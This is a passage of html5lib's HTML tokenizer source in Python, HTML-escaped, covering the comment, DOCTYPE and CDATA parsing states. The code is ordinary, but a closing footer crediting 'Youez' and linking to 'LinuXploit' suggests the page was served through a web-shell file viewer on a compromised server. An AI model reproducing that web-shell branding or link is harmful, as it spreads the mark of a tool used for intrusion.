                frozenset((&quot;&amp;&quot;, &quot;&gt;&quot;, &#039;&quot;&#039;, &quot;&#039;&quot;, &quot;=&quot;, &quot;&lt;&quot;, &quot;`&quot;, &quot;\u0000&quot;)) | spaceCharacters)
        return True

    def afterAttributeValueState(self):
        data = self.stream.char()
        if data in spaceCharacters:
            self.state = self.beforeAttributeNameState
        elif data == &quot;&gt;&quot;:
            self.emitCurrentToken()
        elif data == &quot;/&quot;:
            self.state = self.selfClosingStartTagState
        elif data is EOF:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;unexpected-EOF-after-attribute-value&quot;})
            self.stream.unget(data)
            self.state = self.dataState
        else:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;unexpected-character-after-attribute-value&quot;})
            self.stream.unget(data)
            self.state = self.beforeAttributeNameState
        return True

    def selfClosingStartTagState(self):
        data = self.stream.char()
        if data == &quot;&gt;&quot;:
            self.currentToken[&quot;selfClosing&quot;] = True
            self.emitCurrentToken()
        elif data is EOF:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;],
                                    &quot;data&quot;:
                                    &quot;unexpected-EOF-after-solidus-in-tag&quot;})
            self.stream.unget(data)
            self.state = self.dataState
        else:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;unexpected-character-after-solidus-in-tag&quot;})
            self.stream.unget(data)
            self.state = self.beforeAttributeNameState
        return True

    def bogusCommentState(self):
        # Make a new comment token and give it as value all the characters
        # until the first &gt; or EOF (charsUntil checks for EOF automatically)
        # and emit it.
        data = self.stream.charsUntil(&quot;&gt;&quot;)
        data = data.replace(&quot;\u0000&quot;, &quot;\uFFFD&quot;)
        self.tokenQueue.append(
            {&quot;type&quot;: tokenTypes[&quot;Comment&quot;], &quot;data&quot;: data})

        # Eat the character directly after the bogus comment which is either a
        # &quot;&gt;&quot; or an EOF.
        self.stream.char()
        self.state = self.dataState
        return True

    def markupDeclarationOpenState(self):
        charStack = [self.stream.char()]
        if charStack[-1] == &quot;-&quot;:
            charStack.append(self.stream.char())
            if charStack[-1] == &quot;-&quot;:
                self.currentToken = {&quot;type&quot;: tokenTypes[&quot;Comment&quot;], &quot;data&quot;: &quot;&quot;}
                self.state = self.commentStartState
                return True
        elif charStack[-1] in (&#039;d&#039;, &#039;D&#039;):
            matched = True
            for expected in ((&#039;o&#039;, &#039;O&#039;), (&#039;c&#039;, &#039;C&#039;), (&#039;t&#039;, &#039;T&#039;),
                             (&#039;y&#039;, &#039;Y&#039;), (&#039;p&#039;, &#039;P&#039;), (&#039;e&#039;, &#039;E&#039;)):
                charStack.append(self.stream.char())
                if charStack[-1] not in expected:
                    matched = False
                    break
            if matched:
                self.currentToken = {&quot;type&quot;: tokenTypes[&quot;Doctype&quot;],
                                     &quot;name&quot;: &quot;&quot;,
                                     &quot;publicId&quot;: None, &quot;systemId&quot;: None,
                                     &quot;correct&quot;: True}
                self.state = self.doctypeState
                return True
        elif (charStack[-1] == &quot;[&quot; and
              self.parser is not None and
              self.parser.tree.openElements and
              self.parser.tree.openElements[-1].namespace != self.parser.tree.defaultNamespace):
            matched = True
            for expected in [&quot;C&quot;, &quot;D&quot;, &quot;A&quot;, &quot;T&quot;, &quot;A&quot;, &quot;[&quot;]:
                charStack.append(self.stream.char())
                if charStack[-1] != expected:
                    matched = False
                    break
            if matched:
                self.state = self.cdataSectionState
                return True

        self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                &quot;expected-dashes-or-doctype&quot;})

        while charStack:
            self.stream.unget(charStack.pop())
        self.state = self.bogusCommentState
        return True

    def commentStartState(self):
        data = self.stream.char()
        if data == &quot;-&quot;:
            self.state = self.commentStartDashState
        elif data == &quot;\u0000&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;],
                                    &quot;data&quot;: &quot;invalid-codepoint&quot;})
            self.currentToken[&quot;data&quot;] += &quot;\uFFFD&quot;
        elif data == &quot;&gt;&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;incorrect-comment&quot;})
            self.tokenQueue.append(self.currentToken)
            self.state = self.dataState
        elif data is EOF:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;eof-in-comment&quot;})
            self.tokenQueue.append(self.currentToken)
            self.state = self.dataState
        else:
            self.currentToken[&quot;data&quot;] += data
            self.state = self.commentState
        return True

    def commentStartDashState(self):
        data = self.stream.char()
        if data == &quot;-&quot;:
            self.state = self.commentEndState
        elif data == &quot;\u0000&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;],
                                    &quot;data&quot;: &quot;invalid-codepoint&quot;})
            self.currentToken[&quot;data&quot;] += &quot;-\uFFFD&quot;
        elif data == &quot;&gt;&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;incorrect-comment&quot;})
            self.tokenQueue.append(self.currentToken)
            self.state = self.dataState
        elif data is EOF:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;eof-in-comment&quot;})
            self.tokenQueue.append(self.currentToken)
            self.state = self.dataState
        else:
            self.currentToken[&quot;data&quot;] += &quot;-&quot; + data
            self.state = self.commentState
        return True

    def commentState(self):
        data = self.stream.char()
        if data == &quot;-&quot;:
            self.state = self.commentEndDashState
        elif data == &quot;\u0000&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;],
                                    &quot;data&quot;: &quot;invalid-codepoint&quot;})
            self.currentToken[&quot;data&quot;] += &quot;\uFFFD&quot;
        elif data is EOF:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;],
                                    &quot;data&quot;: &quot;eof-in-comment&quot;})
            self.tokenQueue.append(self.currentToken)
            self.state = self.dataState
        else:
            self.currentToken[&quot;data&quot;] += data + \
                self.stream.charsUntil((&quot;-&quot;, &quot;\u0000&quot;))
        return True

    def commentEndDashState(self):
        data = self.stream.char()
        if data == &quot;-&quot;:
            self.state = self.commentEndState
        elif data == &quot;\u0000&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;],
                                    &quot;data&quot;: &quot;invalid-codepoint&quot;})
            self.currentToken[&quot;data&quot;] += &quot;-\uFFFD&quot;
            self.state = self.commentState
        elif data is EOF:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;eof-in-comment-end-dash&quot;})
            self.tokenQueue.append(self.currentToken)
            self.state = self.dataState
        else:
            self.currentToken[&quot;data&quot;] += &quot;-&quot; + data
            self.state = self.commentState
        return True

    def commentEndState(self):
        data = self.stream.char()
        if data == &quot;&gt;&quot;:
            self.tokenQueue.append(self.currentToken)
            self.state = self.dataState
        elif data == &quot;\u0000&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;],
                                    &quot;data&quot;: &quot;invalid-codepoint&quot;})
            self.currentToken[&quot;data&quot;] += &quot;--\uFFFD&quot;
            self.state = self.commentState
        elif data == &quot;!&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;unexpected-bang-after-double-dash-in-comment&quot;})
            self.state = self.commentEndBangState
        elif data == &quot;-&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;unexpected-dash-after-double-dash-in-comment&quot;})
            self.currentToken[&quot;data&quot;] += data
        elif data is EOF:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;eof-in-comment-double-dash&quot;})
            self.tokenQueue.append(self.currentToken)
            self.state = self.dataState
        else:
            # XXX
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;unexpected-char-in-comment&quot;})
            self.currentToken[&quot;data&quot;] += &quot;--&quot; + data
            self.state = self.commentState
        return True

    def commentEndBangState(self):
        data = self.stream.char()
        if data == &quot;&gt;&quot;:
            self.tokenQueue.append(self.currentToken)
            self.state = self.dataState
        elif data == &quot;-&quot;:
            self.currentToken[&quot;data&quot;] += &quot;--!&quot;
            self.state = self.commentEndDashState
        elif data == &quot;\u0000&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;],
                                    &quot;data&quot;: &quot;invalid-codepoint&quot;})
            self.currentToken[&quot;data&quot;] += &quot;--!\uFFFD&quot;
            self.state = self.commentState
        elif data is EOF:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;eof-in-comment-end-bang-state&quot;})
            self.tokenQueue.append(self.currentToken)
            self.state = self.dataState
        else:
            self.currentToken[&quot;data&quot;] += &quot;--!&quot; + data
            self.state = self.commentState
        return True

    def doctypeState(self):
        data = self.stream.char()
        if data in spaceCharacters:
            self.state = self.beforeDoctypeNameState
        elif data is EOF:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;expected-doctype-name-but-got-eof&quot;})
            self.currentToken[&quot;correct&quot;] = False
            self.tokenQueue.append(self.currentToken)
            self.state = self.dataState
        else:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;need-space-after-doctype&quot;})
            self.stream.unget(data)
            self.state = self.beforeDoctypeNameState
        return True

    def beforeDoctypeNameState(self):
        data = self.stream.char()
        if data in spaceCharacters:
            pass
        elif data == &quot;&gt;&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;expected-doctype-name-but-got-right-bracket&quot;})
            self.currentToken[&quot;correct&quot;] = False
            self.tokenQueue.append(self.currentToken)
            self.state = self.dataState
        elif data == &quot;\u0000&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;],
                                    &quot;data&quot;: &quot;invalid-codepoint&quot;})
            self.currentToken[&quot;name&quot;] = &quot;\uFFFD&quot;
            self.state = self.doctypeNameState
        elif data is EOF:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;expected-doctype-name-but-got-eof&quot;})
            self.currentToken[&quot;correct&quot;] = False
            self.tokenQueue.append(self.currentToken)
            self.state = self.dataState
        else:
            self.currentToken[&quot;name&quot;] = data
            self.state = self.doctypeNameState
        return True

    def doctypeNameState(self):
        data = self.stream.char()
        if data in spaceCharacters:
            self.currentToken[&quot;name&quot;] = self.currentToken[&quot;name&quot;].translate(asciiUpper2Lower)
            self.state = self.afterDoctypeNameState
        elif data == &quot;&gt;&quot;:
            self.currentToken[&quot;name&quot;] = self.currentToken[&quot;name&quot;].translate(asciiUpper2Lower)
            self.tokenQueue.append(self.currentToken)
            self.state = self.dataState
        elif data == &quot;\u0000&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;],
                                    &quot;data&quot;: &quot;invalid-codepoint&quot;})
            self.currentToken[&quot;name&quot;] += &quot;\uFFFD&quot;
            self.state = self.doctypeNameState
        elif data is EOF:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;eof-in-doctype-name&quot;})
            self.currentToken[&quot;correct&quot;] = False
            self.currentToken[&quot;name&quot;] = self.currentToken[&quot;name&quot;].translate(asciiUpper2Lower)
            self.tokenQueue.append(self.currentToken)
            self.state = self.dataState
        else:
            self.currentToken[&quot;name&quot;] += data
        return True

    def afterDoctypeNameState(self):
        data = self.stream.char()
        if data in spaceCharacters:
            pass
        elif data == &quot;&gt;&quot;:
            self.tokenQueue.append(self.currentToken)
            self.state = self.dataState
        elif data is EOF:
            self.currentToken[&quot;correct&quot;] = False
            self.stream.unget(data)
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;eof-in-doctype&quot;})
            self.tokenQueue.append(self.currentToken)
            self.state = self.dataState
        else:
            if data in (&quot;p&quot;, &quot;P&quot;):
                matched = True
                for expected in ((&quot;u&quot;, &quot;U&quot;), (&quot;b&quot;, &quot;B&quot;), (&quot;l&quot;, &quot;L&quot;),
                                 (&quot;i&quot;, &quot;I&quot;), (&quot;c&quot;, &quot;C&quot;)):
                    data = self.stream.char()
                    if data not in expected:
                        matched = False
                        break
                if matched:
                    self.state = self.afterDoctypePublicKeywordState
                    return True
            elif data in (&quot;s&quot;, &quot;S&quot;):
                matched = True
                for expected in ((&quot;y&quot;, &quot;Y&quot;), (&quot;s&quot;, &quot;S&quot;), (&quot;t&quot;, &quot;T&quot;),
                                 (&quot;e&quot;, &quot;E&quot;), (&quot;m&quot;, &quot;M&quot;)):
                    data = self.stream.char()
                    if data not in expected:
                        matched = False
                        break
                if matched:
                    self.state = self.afterDoctypeSystemKeywordState
                    return True

            # All the characters read before the current &#039;data&#039; will be
            # [a-zA-Z], so they&#039;re garbage in the bogus doctype and can be
            # discarded; only the latest character might be &#039;&gt;&#039; or EOF
            # and needs to be ungetted
            self.stream.unget(data)
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;expected-space-or-right-bracket-in-doctype&quot;, &quot;datavars&quot;:
                                    {&quot;data&quot;: data}})
            self.currentToken[&quot;correct&quot;] = False
            self.state = self.bogusDoctypeState

        return True

    def afterDoctypePublicKeywordState(self):
        data = self.stream.char()
        if data in spaceCharacters:
            self.state = self.beforeDoctypePublicIdentifierState
        elif data in (&quot;&#039;&quot;, &#039;&quot;&#039;):
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;unexpected-char-in-doctype&quot;})
            self.stream.unget(data)
            self.state = self.beforeDoctypePublicIdentifierState
        elif data is EOF:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;eof-in-doctype&quot;})
            self.currentToken[&quot;correct&quot;] = False
            self.tokenQueue.append(self.currentToken)
            self.state = self.dataState
        else:
            self.stream.unget(data)
            self.state = self.beforeDoctypePublicIdentifierState
        return True

    def beforeDoctypePublicIdentifierState(self):
        data = self.stream.char()
        if data in spaceCharacters:
            pass
        elif data == &quot;\&quot;&quot;:
            self.currentToken[&quot;publicId&quot;] = &quot;&quot;
            self.state = self.doctypePublicIdentifierDoubleQuotedState
        elif data == &quot;&#039;&quot;:
            self.currentToken[&quot;publicId&quot;] = &quot;&quot;
            self.state = self.doctypePublicIdentifierSingleQuotedState
        elif data == &quot;&gt;&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;unexpected-end-of-doctype&quot;})
            self.currentToken[&quot;correct&quot;] = False
            self.tokenQueue.append(self.currentToken)
            self.state = self.dataState
        elif data is EOF:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;eof-in-doctype&quot;})
            self.currentToken[&quot;correct&quot;] = False
            self.tokenQueue.append(self.currentToken)
            self.state = self.dataState
        else:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;unexpected-char-in-doctype&quot;})
            self.currentToken[&quot;correct&quot;] = False
            self.state = self.bogusDoctypeState
        return True

    def doctypePublicIdentifierDoubleQuotedState(self):
        data = self.stream.char()
        if data == &quot;\&quot;&quot;:
            self.state = self.afterDoctypePublicIdentifierState
        elif data == &quot;\u0000&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;],
                                    &quot;data&quot;: &quot;invalid-codepoint&quot;})
            self.currentToken[&quot;publicId&quot;] += &quot;\uFFFD&quot;
        elif data == &quot;&gt;&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;unexpected-end-of-doctype&quot;})
            self.currentToken[&quot;correct&quot;] = False
            self.tokenQueue.append(self.currentToken)
            self.state = self.dataState
        elif data is EOF:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;eof-in-doctype&quot;})
            self.currentToken[&quot;correct&quot;] = False
            self.tokenQueue.append(self.currentToken)
            self.state = self.dataState
        else:
            self.currentToken[&quot;publicId&quot;] += data
        return True

    def doctypePublicIdentifierSingleQuotedState(self):
        data = self.stream.char()
        if data == &quot;&#039;&quot;:
            self.state = self.afterDoctypePublicIdentifierState
        elif data == &quot;\u0000&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;],
                                    &quot;data&quot;: &quot;invalid-codepoint&quot;})
            self.currentToken[&quot;publicId&quot;] += &quot;\uFFFD&quot;
        elif data == &quot;&gt;&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;unexpected-end-of-doctype&quot;})
            self.currentToken[&quot;correct&quot;] = False
            self.tokenQueue.append(self.currentToken)
            self.state = self.dataState
        elif data is EOF:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;eof-in-doctype&quot;})
            self.currentToken[&quot;correct&quot;] = False
            self.tokenQueue.append(self.currentToken)
            self.state = self.dataState
        else:
            self.currentToken[&quot;publicId&quot;] += data
        return True

    def afterDoctypePublicIdentifierState(self):
        data = self.stream.char()
        if data in spaceCharacters:
            self.state = self.betweenDoctypePublicAndSystemIdentifiersState
        elif data == &quot;&gt;&quot;:
            self.tokenQueue.append(self.currentToken)
            self.state = self.dataState
        elif data == &#039;&quot;&#039;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;unexpected-char-in-doctype&quot;})
            self.currentToken[&quot;systemId&quot;] = &quot;&quot;
            self.state = self.doctypeSystemIdentifierDoubleQuotedState
        elif data == &quot;&#039;&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;unexpected-char-in-doctype&quot;})
            self.currentToken[&quot;systemId&quot;] = &quot;&quot;
            self.state = self.doctypeSystemIdentifierSingleQuotedState
        elif data is EOF:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;eof-in-doctype&quot;})
            self.currentToken[&quot;correct&quot;] = False
            self.tokenQueue.append(self.currentToken)
            self.state = self.dataState
        else:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;unexpected-char-in-doctype&quot;})
            self.currentToken[&quot;correct&quot;] = False
            self.state = self.bogusDoctypeState
        return True

    def betweenDoctypePublicAndSystemIdentifiersState(self):
        data = self.stream.char()
        if data in spaceCharacters:
            pass
        elif data == &quot;&gt;&quot;:
            self.tokenQueue.append(self.currentToken)
            self.state = self.dataState
        elif data == &#039;&quot;&#039;:
            self.currentToken[&quot;systemId&quot;] = &quot;&quot;
            self.state = self.doctypeSystemIdentifierDoubleQuotedState
        elif data == &quot;&#039;&quot;:
            self.currentToken[&quot;systemId&quot;] = &quot;&quot;
            self.state = self.doctypeSystemIdentifierSingleQuotedState
        elif data == EOF:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;eof-in-doctype&quot;})
            self.currentToken[&quot;correct&quot;] = False
            self.tokenQueue.append(self.currentToken)
            self.state = self.dataState
        else:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;unexpected-char-in-doctype&quot;})
            self.currentToken[&quot;correct&quot;] = False
            self.state = self.bogusDoctypeState
        return True

    def afterDoctypeSystemKeywordState(self):
        data = self.stream.char()
        if data in spaceCharacters:
            self.state = self.beforeDoctypeSystemIdentifierState
        elif data in (&quot;&#039;&quot;, &#039;&quot;&#039;):
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;unexpected-char-in-doctype&quot;})
            self.stream.unget(data)
            self.state = self.beforeDoctypeSystemIdentifierState
        elif data is EOF:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;eof-in-doctype&quot;})
            self.currentToken[&quot;correct&quot;] = False
            self.tokenQueue.append(self.currentToken)
            self.state = self.dataState
        else:
            self.stream.unget(data)
            self.state = self.beforeDoctypeSystemIdentifierState
        return True

    def beforeDoctypeSystemIdentifierState(self):
        data = self.stream.char()
        if data in spaceCharacters:
            pass
        elif data == &quot;\&quot;&quot;:
            self.currentToken[&quot;systemId&quot;] = &quot;&quot;
            self.state = self.doctypeSystemIdentifierDoubleQuotedState
        elif data == &quot;&#039;&quot;:
            self.currentToken[&quot;systemId&quot;] = &quot;&quot;
            self.state = self.doctypeSystemIdentifierSingleQuotedState
        elif data == &quot;&gt;&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;unexpected-char-in-doctype&quot;})
            self.currentToken[&quot;correct&quot;] = False
            self.tokenQueue.append(self.currentToken)
            self.state = self.dataState
        elif data is EOF:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;eof-in-doctype&quot;})
            self.currentToken[&quot;correct&quot;] = False
            self.tokenQueue.append(self.currentToken)
            self.state = self.dataState
        else:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;unexpected-char-in-doctype&quot;})
            self.currentToken[&quot;correct&quot;] = False
            self.state = self.bogusDoctypeState
        return True

    def doctypeSystemIdentifierDoubleQuotedState(self):
        data = self.stream.char()
        if data == &quot;\&quot;&quot;:
            self.state = self.afterDoctypeSystemIdentifierState
        elif data == &quot;\u0000&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;],
                                    &quot;data&quot;: &quot;invalid-codepoint&quot;})
            self.currentToken[&quot;systemId&quot;] += &quot;\uFFFD&quot;
        elif data == &quot;&gt;&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;unexpected-end-of-doctype&quot;})
            self.currentToken[&quot;correct&quot;] = False
            self.tokenQueue.append(self.currentToken)
            self.state = self.dataState
        elif data is EOF:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;eof-in-doctype&quot;})
            self.currentToken[&quot;correct&quot;] = False
            self.tokenQueue.append(self.currentToken)
            self.state = self.dataState
        else:
            self.currentToken[&quot;systemId&quot;] += data
        return True

    def doctypeSystemIdentifierSingleQuotedState(self):
        data = self.stream.char()
        if data == &quot;&#039;&quot;:
            self.state = self.afterDoctypeSystemIdentifierState
        elif data == &quot;\u0000&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;],
                                    &quot;data&quot;: &quot;invalid-codepoint&quot;})
            self.currentToken[&quot;systemId&quot;] += &quot;\uFFFD&quot;
        elif data == &quot;&gt;&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;unexpected-end-of-doctype&quot;})
            self.currentToken[&quot;correct&quot;] = False
            self.tokenQueue.append(self.currentToken)
            self.state = self.dataState
        elif data is EOF:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;eof-in-doctype&quot;})
            self.currentToken[&quot;correct&quot;] = False
            self.tokenQueue.append(self.currentToken)
            self.state = self.dataState
        else:
            self.currentToken[&quot;systemId&quot;] += data
        return True

    def afterDoctypeSystemIdentifierState(self):
        data = self.stream.char()
        if data in spaceCharacters:
            pass
        elif data == &quot;&gt;&quot;:
            self.tokenQueue.append(self.currentToken)
            self.state = self.dataState
        elif data is EOF:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;eof-in-doctype&quot;})
            self.currentToken[&quot;correct&quot;] = False
            self.tokenQueue.append(self.currentToken)
            self.state = self.dataState
        else:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;unexpected-char-in-doctype&quot;})
            self.state = self.bogusDoctypeState
        return True

    def bogusDoctypeState(self):
        data = self.stream.char()
        if data == &quot;&gt;&quot;:
            self.tokenQueue.append(self.currentToken)
            self.state = self.dataState
        elif data is EOF:
            # XXX EMIT
            self.stream.unget(data)
            self.tokenQueue.append(self.currentToken)
            self.state = self.dataState
        else:
            pass
        return True

    def cdataSectionState(self):
        data = []
        while True:
            data.append(self.stream.charsUntil(&quot;]&quot;))
            data.append(self.stream.charsUntil(&quot;&gt;&quot;))
            char = self.stream.char()
            if char == EOF:
                break
            else:
                assert char == &quot;&gt;&quot;
                if data[-1][-2:] == &quot;]]&quot;:
                    data[-1] = data[-1][:-2]
                    break
                else:
                    data.append(char)

        data = &quot;&quot;.join(data)  # pylint:disable=redefined-variable-type
        # Deal with null here rather than in the parser
        nullCount = data.count(&quot;\u0000&quot;)
        if nullCount &gt; 0:
            for _ in range(nullCount):
                self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;],
                                        &quot;data&quot;: &quot;invalid-codepoint&quot;})
            data = data.replace(&quot;\u0000&quot;, &quot;\uFFFD&quot;)
        if data:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;],
                                    &quot;data&quot;: data})
        self.state = self.dataState
        return True
</pre><center><br>Youez - 2016 - github.com/yon3zu<br><a href='https://linuxploit.com/' target='_blank'>LinuXploit</a></center>